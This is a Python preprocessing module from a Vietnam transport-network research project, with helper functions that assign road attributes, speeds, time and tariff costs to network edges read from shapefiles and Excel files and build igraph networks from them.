811589c5ec25c65818812b76730c53ed53da0471 | 41,126 | py | Python | src/vtra/preprocess/transport_network_inputs.py | GFDRR/vietnam-transport | 71f6fc8cb7f1ca7bccb9a29d544869b442e68bfc | [
"MIT"
] | 3 | 2018-07-09T12:15:46.000Z | 2020-12-03T07:02:23.000Z | src/vtra/preprocess/transport_network_inputs.py | GFDRR/vietnam-transport | 71f6fc8cb7f1ca7bccb9a29d544869b442e68bfc | [
"MIT"
] | 1 | 2019-05-09T21:57:20.000Z | 2019-05-09T21:57:20.000Z | src/vtra/preprocess/transport_network_inputs.py | GFDRR/vietnam-transport | 71f6fc8cb7f1ca7bccb9a29d544869b442e68bfc | [
"MIT"
] | 2 | 2018-07-23T12:49:21.000Z | 2021-06-03T11:00:44.000Z | """Utility functions for transport networks
Purpose
-------
Helper functions to create post-processeed networks with attributes from specific types of input datasets
References
----------
1. Pant, R., Koks, E.E., Russell, T., Schoenmakers, R. & Hall, J.W. (2018).
Analysis and development of model for addressing climate change/disaster risks in multi-modal transport networks in Vietnam.
Final Report, Oxford Infrastructure Analytics Ltd., Oxford, UK.
2. All input data folders and files referred to in the code below.
"""
import csv
import os
import geopandas as gpd
import igraph as ig
import networkx as nx
import numpy as np
import pandas as pd
from vtra.utils import line_length
def assign_province_road_conditions(x):
"""Assign road conditions as paved or unpaved to Province roads
Parameters
x - Pandas DataFrame of values
- code - Numeric code for type of asset
- level - Numeric code for level of asset
Returns
String value as paved or unpaved
"""
asset_code = x.code
asset_level = x.level
# This is an expressway, national and provincial road
if asset_code in (17, 303) or asset_level in (0, 1):
return 'paved'
else:
# Anything else not included above
return 'unpaved'
def assign_assumed_width_to_province_roads_from_file(asset_width, width_range_list):
"""Assign widths to Province roads assets in Vietnam
The widths are assigned based on our understanding of:
1. The reported width in the data which is not reliable
2. A design specification based understanding of the assumed width based on ranges of
values
Parameters
- asset_width - Numeric value for width of asset
- width_range_list - List of tuples containing (from_width, to_width, assumed_width)
Returns
assumed_width - assigned width of the raod asset based on design specifications
"""
assumed_width = asset_width
for width_vals in width_range_list:
if width_vals[0] <= assumed_width <= width_vals[1]:
assumed_width = width_vals[2]
break
return assumed_width
def assign_assumed_width_to_province_roads(x):
"""Assign widths to Province roads assets in Vietnam
Parameters
x : int value for width of asset
Returns
int assigned width of the road asset based on design specifications
"""
if float(x.width) == 0:
return 4.5
else:
return float(x.width)
def assign_asset_type_to_province_roads_from_file(asset_code, asset_type_list):
"""Assign asset types to roads assets in Vietnam based on values in file
The types are assigned based on our understanding of:
1. The reported asset code in the data
Parameters
- asset_code - Numeric value for code of asset
- asset_type_list - List of Strings wiht names of asset types
Returns
asset_type - String name of type of asset
"""
asset_type = 'road'
for asset in asset_type_list:
if asset_code == asset[0]:
asset_type = asset[2]
break
return asset_type
def assign_asset_type_to_province_roads(x):
"""Assign asset types to roads assets in Vietnam
The types are assigned based on our understanding of:
1. The reported asset code in the data
Parameters
x - Pandas DataFrame with numeric asset code
Returns
asset type - Which is either of (Bridge, Dam, Culvert, Tunnel, Spillway, Road)
"""
if x.code in (12, 25):
return 'Bridge'
elif x.code == (23):
return 'Dam'
elif x.code == (24):
return 'Culvert'
elif x.code == (26):
return 'Tunnel'
elif x.code == (27):
return 'Spillway'
else:
return 'Road'
def assign_minmax_travel_speeds_province_roads_apply(x):
"""Assign travel speeds to roads assets in Vietnam
The speeds are assigned based on our understanding of:
1. The types of assets
2. The levels of classification of assets: 0-National, 1-Provinical, 2-Local, 3-Other
3. The terrain where the assets are located: Flat or Mountain or No information
Parameters
x - Pandas dataframe with values
- code - Numeric code for type of asset
- level - Numeric code for level of asset
- terrain - String value of the terrain of asset
Returns
- Float minimum assigned speed in km/hr
- Float maximum assigned speed in km/hr
"""
asset_code = x.code
asset_level = x.level
asset_terrain = x.terrain
if (not asset_terrain) or ('flat' in asset_terrain.lower()):
if asset_code == 17:
# This is an expressway
return 100, 120
elif asset_code in (15, 4):
# This is a residential road or a mountain pass
return 40, 60
elif asset_level == 0:
# This is any other national network asset
return 80, 100
elif asset_level == 1:
# This is any other provincial network asset
return 60, 80
elif asset_level == 2:
# This is any other local network asset
return 40, 60
else:
# Anything else not included above
return 20, 40
else:
if asset_level < 3:
return 40, 60
else:
return 20, 40
def assign_minmax_time_costs_province_roads_apply(x, cost_dataframe):
"""Assign time costs on Province roads in Vietnam
The costs are assigned based on our understanding of:
1. The types of assets
2. The levels of classification of assets: 0-National, 1-Provinical, 2-Local, 3-Other
3. The terrain where the assets are located: Flat or Mountain or No information
Parameters
- x - Pandas dataframe with values
- code - Numeric code for type of asset
- level - Numeric code for level of asset
- terrain - String value of the terrain of asset
- length - Float length of edge in km
- min_speed - Float minimum assigned speed in km/hr
- max_speed - Float maximum assigned speed in km/hr
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_time_cost - Float minimum assigned cost of time in USD
- max_time_cost - Float maximum assigned cost of time in USD
"""
asset_code = x.code
asset_level = x.level
asset_terrain = x.terrain
min_time_cost = 0
max_time_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if cost_param.code == asset_code:
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
break
elif cost_param.level == asset_level and cost_param.terrain == asset_terrain:
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
break
return min_time_cost, max_time_cost
def assign_minmax_tariff_costs_province_roads_apply(x, cost_dataframe):
"""Assign tariff costs on Province roads in Vietnam
The costs are assigned based on our understanding of:
1. The types of assets
2. The levels of classification of assets: 0-National, 1-Provinical, 2-Local, 3-Other
3. The terrain where the assets are located: Flat or Mountain or No information
Parameters
- x - Pandas dataframe with values
- code - Numeric code for type of asset
- level - Numeric code for level of asset
- terrain - String value of the terrain of asset
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_tariff_cost - Float minimum assigned tariff cost in USD/ton
- max_tariff_cost - Float maximum assigned tariff cost in USD/ton
"""
asset_code = x.code
asset_level = x.level
asset_terrain = x.terrain
min_tariff_cost = 0
max_tariff_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if cost_param.code == asset_code:
min_tariff_cost = 1.0*cost_param.tariff_min_usd*x.length
max_tariff_cost = 1.0*cost_param.tariff_max_usd*x.length
break
elif cost_param.level == asset_level and cost_param.terrain == asset_terrain:
min_tariff_cost = 1.0*cost_param.tariff_min_usd*x.length
max_tariff_cost = 1.0*cost_param.tariff_max_usd*x.length
break
return min_tariff_cost, max_tariff_cost
def province_shapefile_to_dataframe(edges_in, road_terrain, road_properties_file,usage_factors):
"""Create province network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- road_terrain - String name of terrain: flat or mountanious
- road_properties_file - String path to Excel file with road attributes
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
edges - Geopandas DataFrame with network edge topology and attributes
"""
add_columns = ['number','name','terrain','level','surface','road_class',
'road_cond','asset_type','width','length','min_speed','max_speed',
'min_time','max_time','min_time_cost','max_time_cost','min_tariff_cost',
'max_tariff_cost','vehicle_co']
edges = gpd.read_file(edges_in,encoding='utf-8')
edges.columns = map(str.lower, edges.columns)
edges['number'] = ''
edges['name'] = ''
edges['surface'] = ''
edges['road_class'] = ''
edges['vehicle_co'] = 0
# assgin asset terrain
edges['terrain'] = road_terrain
# assign road conditon
edges['road_cond'] = edges.apply(assign_province_road_conditions, axis=1)
# assign asset type
asset_type_list = [
tuple(x) for x in
pd.read_excel(road_properties_file, sheet_name='provincial').values
]
edges['asset_type'] = edges.code.apply(
lambda x: assign_asset_type_to_province_roads_from_file(x, asset_type_list))
# get the right linelength
edges['length'] = edges.geometry.apply(line_length)
# correct the widths of the road assets
# get the width of edges
# width_range_list = [
# tuple(x) for x in
# pd.read_excel(road_properties_file, sheet_name='widths').values
# ]
# edges['width'] = edges.width.apply(
# lambda x: assign_assumed_width_to_province_roads_from_file(x, width_range_list))
edges['width'] = edges.apply(assign_assumed_width_to_province_roads,axis=1)
# assign minimum and maximum speed to network
edges['speed'] = edges.apply(assign_minmax_travel_speeds_province_roads_apply, axis=1)
edges[['min_speed', 'max_speed']] = edges['speed'].apply(pd.Series)
edges.drop('speed', axis=1, inplace=True)
# assign minimum and maximum travel time to network
edges['min_time'] = edges['length']/edges['max_speed']
edges['max_time'] = edges['length']/edges['min_speed']
cost_values_df = pd.read_excel(road_properties_file, sheet_name='costs')
# assign minimum and maximum cost of time in USD to the network
# the costs of time = (unit cost of time in USD/hr)*(travel time in hr)
edges['time_cost'] = edges.apply(
lambda x: assign_minmax_time_costs_province_roads_apply(x, cost_values_df), axis=1)
edges[['min_time_cost', 'max_time_cost']] = edges['time_cost'].apply(pd.Series)
edges.drop('time_cost', axis=1, inplace=True)
# assign minimum and maximum cost of tonnage in USD/ton to the network
# the costs of time = (unit cost of tariff in USD/ton-km)*(length in km)
edges['tariff_cost'] = edges.apply(
lambda x: assign_minmax_tariff_costs_province_roads_apply(x, cost_values_df), axis=1)
edges[['min_tariff_cost', 'max_tariff_cost']] = edges['tariff_cost'].apply(pd.Series)
edges.drop('tariff_cost', axis=1, inplace=True)
edges['min_time_cost'] = (1 + usage_factors[0])*edges['min_time_cost']
edges['max_time_cost'] = (1 + usage_factors[1])*edges['max_time_cost']
edges['min_tariff_cost'] = (1 + usage_factors[0])*edges['min_tariff_cost']
edges['max_tariff_cost'] = (1 + usage_factors[1])*edges['max_tariff_cost']
# make sure that From and To node are the first two columns of the dataframe
# to make sure the conversion from dataframe to igraph network goes smooth
edges = edges[['edge_id','g_id','from_node','to_node'] + add_columns + ['geometry']]
edges = edges.reindex(list(edges.columns)[2:]+list(edges.columns)[:2], axis=1)
return edges
def province_shapefile_to_network(edges_in, road_terrain, road_properties_file,usage_factors):
"""Create province igraph network from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- road_terrain - String name of terrain: flat or mountanious
- road_properties_file - String path to Excel file with road attributes
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
G - Igraph object with network edge topology and attributes
"""
edges = province_shapefile_to_dataframe(edges_in, road_terrain, road_properties_file,usage_factors)
G = ig.Graph.TupleList(edges.itertuples(index=False), edge_attrs=list(edges.columns)[2:])
return G
def assign_national_road_terrain(x):
"""Assign terrain as flat or mountain to national roads
Parameters
x - Pandas DataFrame of values
- dia_hinh__ - String value of type of terrain
Returns
String value of terrain as flat or mountain
"""
terrain_type = x.dia_hinh__
if terrain_type is None:
return 'flat'
elif 'flat' in terrain_type.lower().strip():
# Assume flat for all roads with no terrain
return 'flat'
else:
# Anything else not included above
return 'mountain'
def assign_national_road_conditions(x):
"""Assign road conditions as paved or unpaved to national roads
Parameters
x - Pandas DataFrame of values
- loai_mat__ - String value of road surface
Returns
String value of road as paved or unpaved
"""
road_cond = x.loai_mat__
if road_cond is None:
return 'paved'
elif 'asphalt' in road_cond.lower().strip():
# Assume asphalt for all roads with no condition
return 'paved'
else:
# Anything else not included above
return 'unpaved'
def assign_national_road_class(x):
"""Assign road speeds to national roads
Parameters
x - Pandas DataFrame of values
- capkth__ca - String value of road class
- vehicle_co - Float value of number of vehicles on road
Returns
- Integer value of road class
"""
road_class = x.capkth__ca
vehicle_numbers = x.vehicle_co
if road_class is None:
if vehicle_numbers >= 6000:
return 1
elif 3000 <= vehicle_numbers < 6000:
return 2
elif 1000 <= vehicle_numbers < 3000:
return 3
elif 300 <= vehicle_numbers < 1000:
return 4
elif 50 <= vehicle_numbers < 300:
return 5
else:
return 6
else:
if ',' in road_class:
road_class = road_class.split(',')
else:
road_class = [road_class]
class_1 = [rc for rc in road_class if rc == 'i']
class_2 = [rc for rc in road_class if rc == 'ii']
class_3 = [rc for rc in road_class if rc == 'iii']
class_4 = [rc for rc in road_class if rc == 'iv']
class_5 = [rc for rc in road_class if rc == 'v']
class_6 = [rc for rc in road_class if rc == 'vi']
if class_1:
return 1
elif class_2:
return 2
elif class_3:
return 3
elif class_4:
return 4
elif class_5:
return 5
elif class_6:
return 6
elif vehicle_numbers >= 6000:
return 1
elif 3000 <= vehicle_numbers < 6000:
return 2
elif 1000 <= vehicle_numbers < 3000:
return 3
elif 300 <= vehicle_numbers < 1000:
return 4
elif 50 <= vehicle_numbers < 300:
return 5
else:
return 6
def assign_assumed_width_to_national_roads_from_file(x, flat_width_range_list, mountain_width_range_list):
"""Assign widths to national roads assets in Vietnam
The widths are assigned based on our understanding of:
1. The class of the road which is not reliable
2. The number of lanes
3. The terrain of the road
Parameters
- x - Pandas DataFrame row with values
- road_class - Integer value of road class
- lanenum__s - Integer value of number of lanes on road
- flat_width_range_list - List of tuples containing (from_width, to_width, assumed_width)
- moiuntain_width_range_list - List of tuples containing (from_width, to_width, assumed_width)
Returns
assumed_width - Float assigned width of the road asset based on design specifications
"""
road_class = x.road_class
road_lanes = x.lanenum__s
if road_lanes is None:
road_lanes = 0
else:
road_lanes = int(road_lanes)
road_terrain = x.terrain
assumed_width = 3.5
if road_terrain == 'flat':
for vals in flat_width_range_list:
if road_class == vals.road_class:
if road_lanes > 0 and road_lanes <= 8:
assumed_width = road_lanes * vals.lane_width + \
vals.median_strip + 2.0 * vals.shoulder_width
else:
assumed_width = vals.road_width
break
else:
for vals in mountain_width_range_list:
if road_class == vals.road_class:
if road_lanes > 0 and road_lanes <= 8:
assumed_width = road_lanes * vals.lane_width + \
vals.median_strip + 2.0 * vals.shoulder_width
else:
assumed_width = vals.road_width
break
return assumed_width
def assign_min_max_speeds_to_national_roads_from_file(x, flat_width_range_list,
mountain_width_range_list):
"""Assign speeds to national roads in Vietnam
The speeds are assigned based on our understanding of:
1. The class of the road
2. The estimated speed from the CVTS data
3. The terrain of the road
Parameters
x - Pandas DataFrame of values
- road_class - Integer value of road class
- terrain - String value of road terrain
- est_speed - Float value of estimated speed from CVTS data
- flat_width_range_list - List of tuples containing design speeds
- moiuntain_width_range_list - List of tuples containing design speeds
Returns
- Float minimum assigned speed in km/hr
- Float maximum assigned speed in km/hr
"""
road_class = x.road_class
road_terrain = x.terrain
est_speed = x.est_speed
min_speed = est_speed
max_speed = est_speed
if road_terrain == 'flat':
for vals in flat_width_range_list:
if road_class == vals.road_class:
if est_speed == 0:
min_speed = vals.design_speed
max_speed = vals.design_speed
elif est_speed >= vals.design_speed:
min_speed = vals.design_speed
else:
max_speed = vals.design_speed
break
else:
for vals in mountain_width_range_list:
if road_class == vals.road_class:
if est_speed == 0:
min_speed = vals.design_speed
max_speed = vals.design_speed
elif est_speed >= vals.design_speed:
min_speed = vals.design_speed
else:
max_speed = vals.design_speed
break
return min_speed, max_speed
def assign_minmax_time_costs_national_roads_apply(x, cost_dataframe):
"""Assign time costs on national roads in Vietnam
The costs are assigned based on our understanding of:
1. The vehicle counts on roads
2. The levels of classification of assets: 0-National, 1-Provinical, 2-Local, 3-Other
3. The terrain where the assets are located: Flat or Mountain or No information
Parameters
- x - Pandas dataframe with values
- vehicle_co - Count of number of vehicles on road
- code - Numeric code for type of asset
- level - Numeric code for level of asset
- terrain - String value of the terrain of asset
- length - Float length of edge in km
- min_speed - Float minimum assigned speed in km/hr
- max_speed - Float maximum assigned speed in km/hr
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_time_cost - Float minimum assigned cost of time in USD
- max_time_cost - Float maximum assigned cost of time in USD
"""
if x.vehicle_co > 2000:
asset_code = 17
else:
asset_code = 1
asset_level = 1
asset_terrain = x.terrain
min_time_cost = 0
max_time_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if (cost_param.code == asset_code) and (cost_param.road_cond == x.road_cond):
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
break
elif (cost_param.level == asset_level) and (cost_param.terrain == asset_terrain) and \
(cost_param.road_cond == x.road_cond):
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
break
return min_time_cost, max_time_cost
def assign_minmax_tariff_costs_national_roads_apply(x, cost_dataframe):
"""Assign tariff costs on national roads in Vietnam
The costs are assigned based on our understanding of:
1. The vehicle counts on roads
Parameters
- x - Pandas dataframe with values
- vehicle_co - Count of number of vehicles on road
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_tariff_cost - Float minimum assigned tariff cost in USD/ton
- max_tariff_cost - Float maximum assigned tariff cost in USD/ton
"""
min_tariff_cost = 0
max_tariff_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if cost_param.vehicle_min <= x.vehicle_co < cost_param.vehicle_max:
min_tariff_cost = 1.0*cost_param.tariff_min_usd*x.length
max_tariff_cost = 1.0*cost_param.tariff_max_usd*x.length
break
return min_tariff_cost, max_tariff_cost
def national_road_shapefile_to_dataframe(edges_in, road_properties_file,usage_factors):
"""Create national network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- road_properties_file - String path to Excel file with road attributes
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
edges: Geopandas DataFrame with network edge topology and attributes
"""
add_columns = ['number','name','terrain','level','surface','road_class',
'road_cond','asset_type','width','length','min_speed','max_speed',
'min_time','max_time','min_time_cost','max_time_cost','min_tariff_cost',
'max_tariff_cost','vehicle_co']
edges = gpd.read_file(edges_in,encoding='latin1')
edges.columns = map(str.lower, edges.columns)
edges['asset_type'] = ''
edges['level'] = ''
# assgin asset terrain
edges['terrain'] = edges.apply(assign_national_road_terrain, axis=1)
# assign road conditon
edges['road_cond'] = edges.apply(assign_national_road_conditions, axis=1)
# assign road class
edges['road_class'] = edges.apply(assign_national_road_class, axis=1)
# get the right linelength
edges['length'] = edges.geometry.apply(line_length)
# correct the widths of the road assets
# get the width of edges
flat_width_range_list = list(pd.read_excel(
road_properties_file, sheet_name='flat_terrain_designs').itertuples(index=False))
mountain_width_range_list = list(pd.read_excel(
road_properties_file, sheet_name='mountain_terrain_designs').itertuples(index=False))
edges['width'] = edges.apply(lambda x: assign_assumed_width_to_national_roads_from_file(
x, flat_width_range_list, mountain_width_range_list), axis=1)
# assign minimum and maximum speed to network
edges['speed'] = edges.apply(lambda x: assign_min_max_speeds_to_national_roads_from_file(
x, flat_width_range_list, mountain_width_range_list), axis=1)
edges[['min_speed', 'max_speed']] = edges['speed'].apply(pd.Series)
edges.drop('speed', axis=1, inplace=True)
# assign minimum and maximum travel time to network
edges['min_time'] = edges['length']/edges['max_speed']
edges['max_time'] = edges['length']/edges['min_speed']
cost_values_df = pd.read_excel(road_properties_file, sheet_name='costs')
# assign minimum and maximum cost of time in USD to the network
# the costs of time = (unit cost of time in USD/hr)*(travel time in hr)
edges['time_cost'] = edges.apply(
lambda x: assign_minmax_time_costs_national_roads_apply(x, cost_values_df), axis=1)
edges[['min_time_cost', 'max_time_cost']] = edges['time_cost'].apply(pd.Series)
edges.drop('time_cost', axis=1, inplace=True)
# assign minimum and maximum cost of tonnage in USD/ton to the network
# the costs of time = (unit cost of tariff in USD/ton-km)*(length in km)
edges['tariff_cost'] = edges.apply(
lambda x: assign_minmax_tariff_costs_national_roads_apply(x, cost_values_df), axis=1)
edges[['min_tariff_cost', 'max_tariff_cost']] = edges['tariff_cost'].apply(pd.Series)
edges.drop('tariff_cost', axis=1, inplace=True)
edges.rename(columns={'ten_duong_':'number','ten_doan__':'name','loai_mat__':'surface'},inplace = True)
edges['min_time_cost'] = (1 + usage_factors[0])*edges['min_time_cost']
edges['max_time_cost'] = (1 + usage_factors[1])*edges['max_time_cost']
edges['min_tariff_cost'] = (1 + usage_factors[0])*edges['min_tariff_cost']
edges['max_tariff_cost'] = (1 + usage_factors[1])*edges['max_tariff_cost']
# make sure that From and To node are the first two columns of the dataframe
# to make sure the conversion from dataframe to igraph network goes smooth
edges = edges[['edge_id','g_id','from_node','to_node'] + add_columns + ['geometry']]
edges = edges.reindex(list(edges.columns)[2:]+list(edges.columns)[:2], axis=1)
return edges
def national_road_shapefile_to_network(edges_in, road_properties_file,usage_factors):
"""Create national igraph network from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- road_properties_file - String path to Excel file with road attributes
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
G - Igraph object with network edge topology and attributes
"""
edges = national_road_shapefile_to_dataframe(edges_in, road_properties_file,usage_factors)
G = ig.Graph.TupleList(edges.itertuples(index=False), edge_attrs=list(edges.columns)[2:])
# only keep connected network
return G
def assign_minmax_time_costs_networks_apply(x, cost_dataframe):
"""Assign time costs on networks in Vietnam
Parameters
- x - Pandas dataframe with values
- length - Float length of edge in km
- min_speed - Float minimum assigned speed in km/hr
- max_speed - Float maximum assigned speed in km/hr
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_time_cost - Float minimum assigned cost of time in USD
- max_time_cost - Float maximum assigned cost of time in USD
"""
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
return min_time_cost, max_time_cost
def assign_minmax_tariff_costs_networks_apply(x, cost_dataframe):
"""Assign tariff costs on networks in Vietnam
Parameters
- x - Pandas dataframe with values
- length - Float length of edge in km
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_tariff_cost - Float minimum assigned tariff cost in USD/ton
- max_tariff_cost - Float maximum assigned tariff cost in USD/ton
"""
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
min_tariff_cost = 1.0*cost_param.tariff_min_usd*x.length
max_tariff_cost = 1.0*cost_param.tariff_max_usd*x.length
return min_tariff_cost, max_tariff_cost
def network_shapefile_to_dataframe(edges_in, mode_properties_file, mode_name, speed_min, speed_max,usage_factors):
"""Create network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- mode_properties_file - String path to Excel file with mode attributes
- mode_name - String name of mode
- speed_min - Float value of minimum assgined speed
- speed_max - Float value of maximum assgined speed
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
edges - Geopandas DataFrame with network edge topology and attributes
"""
add_columns = ['number','name','terrain','level',
'width','length','min_speed','max_speed',
'min_time','max_time','min_time_cost','max_time_cost','min_tariff_cost',
'max_tariff_cost','vehicle_co']
edges = gpd.read_file(edges_in,encoding='utf-8')
edges.columns = map(str.lower, edges.columns)
edges['number'] = ''
edges['terrain'] = ''
edges['level'] = ''
edges['width'] = 0
edges['vehicle_co'] = 0
if mode_name == 'rail':
edges.rename(columns={'railwaylin':'name'},inplace = True)
elif mode_name in ['inland','coastal']:
edges.rename(columns={'link':'name'},inplace = True)
else:
edges['name'] = ''
# assgin asset terrain
# get the right linelength
edges['length'] = edges.geometry.apply(line_length)
# assign some speeds
edges['min_speed'] = speed_min
edges['max_speed'] = speed_max
# assign minimum and maximum travel time to network
edges['min_time'] = edges['length']/edges['max_speed']
edges['max_time'] = edges['length']/edges['min_speed']
cost_values_df = pd.read_excel(mode_properties_file, sheet_name=mode_name)
# assign minimum and maximum cost of time in USD to the network
# the costs of time = (unit cost of time in USD/hr)*(travel time in hr)
edges['time_cost'] = edges.apply(
lambda x: assign_minmax_time_costs_networks_apply(x, cost_values_df), axis=1)
edges[['min_time_cost', 'max_time_cost']] = edges['time_cost'].apply(pd.Series)
edges.drop('time_cost', axis=1, inplace=True)
# assign minimum and maximum cost of tonnage in USD/ton to the network
# the costs of time = (unit cost of tariff in USD/ton-km)*(length in km)
edges['tariff_cost'] = edges.apply(
lambda x: assign_minmax_tariff_costs_networks_apply(x, cost_values_df), axis=1)
edges[['min_tariff_cost', 'max_tariff_cost']] = edges['tariff_cost'].apply(pd.Series)
edges.drop('tariff_cost', axis=1, inplace=True)
edges['min_time_cost'] = (1 + usage_factors[0])*edges['min_time_cost']
edges['max_time_cost'] = (1 + usage_factors[1])*edges['max_time_cost']
edges['min_tariff_cost'] = (1 + usage_factors[0])*edges['min_tariff_cost']
edges['max_tariff_cost'] = (1 + usage_factors[1])*edges['max_tariff_cost']
# make sure that From and To node are the first two columns of the dataframe
# to make sure the conversion from dataframe to igraph network goes smooth
edges = edges[['edge_id','g_id','from_node','to_node'] + add_columns + ['geometry']]
edges = edges.reindex(list(edges.columns)[2:]+list(edges.columns)[:2], axis=1)
return edges
def network_shapefile_to_network(edges_in, mode_properties_file, mode_name, speed_min, speed_max,utilization_factors):
"""Create igraph network from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- mode_properties_file - String path to Excel file with mode attributes
- mode_name - String name of mode
- speed_min - Float value of minimum assgined speed
- speed_max - Float value of maximum assgined speed
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
G - Igraph object with network edge topology and attributes
"""
edges = network_shapefile_to_dataframe(
edges_in, mode_properties_file, mode_name, speed_min, speed_max,utilization_factors)
G = ig.Graph.TupleList(edges.itertuples(index=False), edge_attrs=list(edges.columns)[2:])
# only keep connected network
return G
def assign_minmax_tariff_costs_multi_modal_apply(x, cost_dataframe):
"""Assign tariff costs on multi-modal network links in Vietnam
Parameters
- x - Pandas dataframe with values
- port_type - String name of port type
- from_mode - String name of mode
- to_mode - String name of mode
- other_mode - String name of mode
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_tariff_cost - Float minimum assigned tariff cost in USD/ton
- max_tariff_cost - Float maximum assigned tariff cost in USD/ton
"""
min_tariff_cost = 0
max_tariff_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if cost_param.one_mode == x.port_type and cost_param.other_mode == x.to_mode:
min_tariff_cost = cost_param.tariff_min_usd
max_tariff_cost = cost_param.tariff_max_usd
break
elif cost_param.one_mode == x.to_mode and cost_param.other_mode == x.from_mode:
min_tariff_cost = cost_param.tariff_min_usd
max_tariff_cost = cost_param.tariff_max_usd
break
elif cost_param.one_mode == x.to_mode and cost_param.other_mode == x.port_type:
min_tariff_cost = cost_param.tariff_min_usd
max_tariff_cost = cost_param.tariff_max_usd
break
elif cost_param.one_mode == x.from_mode and cost_param.other_mode == x.to_mode:
min_tariff_cost = cost_param.tariff_min_usd
max_tariff_cost = cost_param.tariff_max_usd
break
return min_tariff_cost, max_tariff_cost
def multi_modal_shapefile_to_dataframe(edges_in, mode_properties_file, mode_name, length_threshold,usage_factors):
"""Create multi-modal network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- mode_properties_file - String path to Excel file with mode attributes
- mode_name - String name of mode
- length_threshold - Float value of threshold in km of length of multi-modal links
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
edges - Geopandas DataFrame with network edge topology and attributes
"""
edges = gpd.read_file(edges_in,encoding='utf-8')
edges.columns = map(str.lower, edges.columns)
# assgin asset terrain
# get the right linelength
edges['length'] = edges.geometry.apply(line_length)
cost_values_df = pd.read_excel(mode_properties_file, sheet_name=mode_name)
# assign minimum and maximum cost of tonnage in USD/ton to the network
# the costs of time = (unit cost of tariff in USD/ton)
edges['tariff_cost'] = edges.apply(
lambda x: assign_minmax_tariff_costs_multi_modal_apply(x, cost_values_df), axis=1)
edges[['min_tariff_cost', 'max_tariff_cost']] = edges['tariff_cost'].apply(pd.Series)
edges.drop('tariff_cost', axis=1, inplace=True)
edges['min_time'] = 0
edges['max_time'] = 0
edges['min_time_cost'] = 0
edges['max_time_cost'] = 0
edges['min_time_cost'] = (1 + usage_factors[0])*edges['min_time_cost']
edges['max_time_cost'] = (1 + usage_factors[1])*edges['max_time_cost']
edges['min_tariff_cost'] = (1 + usage_factors[0])*edges['min_tariff_cost']
edges['max_tariff_cost'] = (1 + usage_factors[1])*edges['max_tariff_cost']
# make sure that From and To node are the first two columns of the dataframe
# to make sure the conversion from dataframe to igraph network goes smooth
edges = edges.reindex(list(edges.columns)[2:]+list(edges.columns)[:2], axis=1)
edges = edges[edges['length'] < length_threshold]
return edges
def multi_modal_shapefile_to_network(edges_in, mode_properties_file, mode_name, length_threshold,utilization_factors):
"""Create multi-modal igraph network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- mode_properties_file - String path to Excel file with mode attributes
- mode_name - String name of mode
- length_threshold - Float value of threshold in km of length of multi-modal links
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
G - Igraph object with network edge topology and attributes
"""
edges = multi_modal_shapefile_to_dataframe(
edges_in, mode_properties_file, mode_name, length_threshold,utilization_factors)
G = ig.Graph.TupleList(edges.itertuples(index=False), edge_attrs=list(edges.columns)[2:])
# only keep connected network
return G
def create_port_names(x,port_names_df):
"""Add port names in Vietnamese to port data
Parameters
- x - Pandas DataFrame with values
- port_type - String type of port
- cangbenid - Integer ID of inland port
- objectid - Integer ID of sea port
- port_names_df - Pandas DataFrame with port names
Returns
name - Vietnamese name of port
"""
name = ''
for iter_,port_names in port_names_df.iterrows():
if (x.port_type == 'inland') and (port_names.port_type == 'inland') and (x.cangbenid == port_names.cangbenid):
name = port_names.ten
elif (x.port_type == 'sea') and (port_names.port_type == 'sea') and (x.objectid == port_names.objectid):
name = port_names.ten_cang
return name
def read_waterway_ports(ports_file_with_ids, ports_file_with_names):
"""Create port data with attributes
Parameters
- ports_file_with_ids - String path of GeoDataFrame with port IDs
- ports_file_with_names - String path of GeoDataFrame with port names
Returns
ports_with_id - GeoPandas DataFrame with port attributes
"""
# load data
ports_with_name = gpd.read_file(ports_file_with_names, encoding='utf-8')
ports_with_id = gpd.read_file(ports_file_with_ids, encoding='utf-8')
ports_with_id.columns = map(str.lower, ports_with_id.columns)
ports_with_name.columns = map(str.lower, ports_with_name.columns)
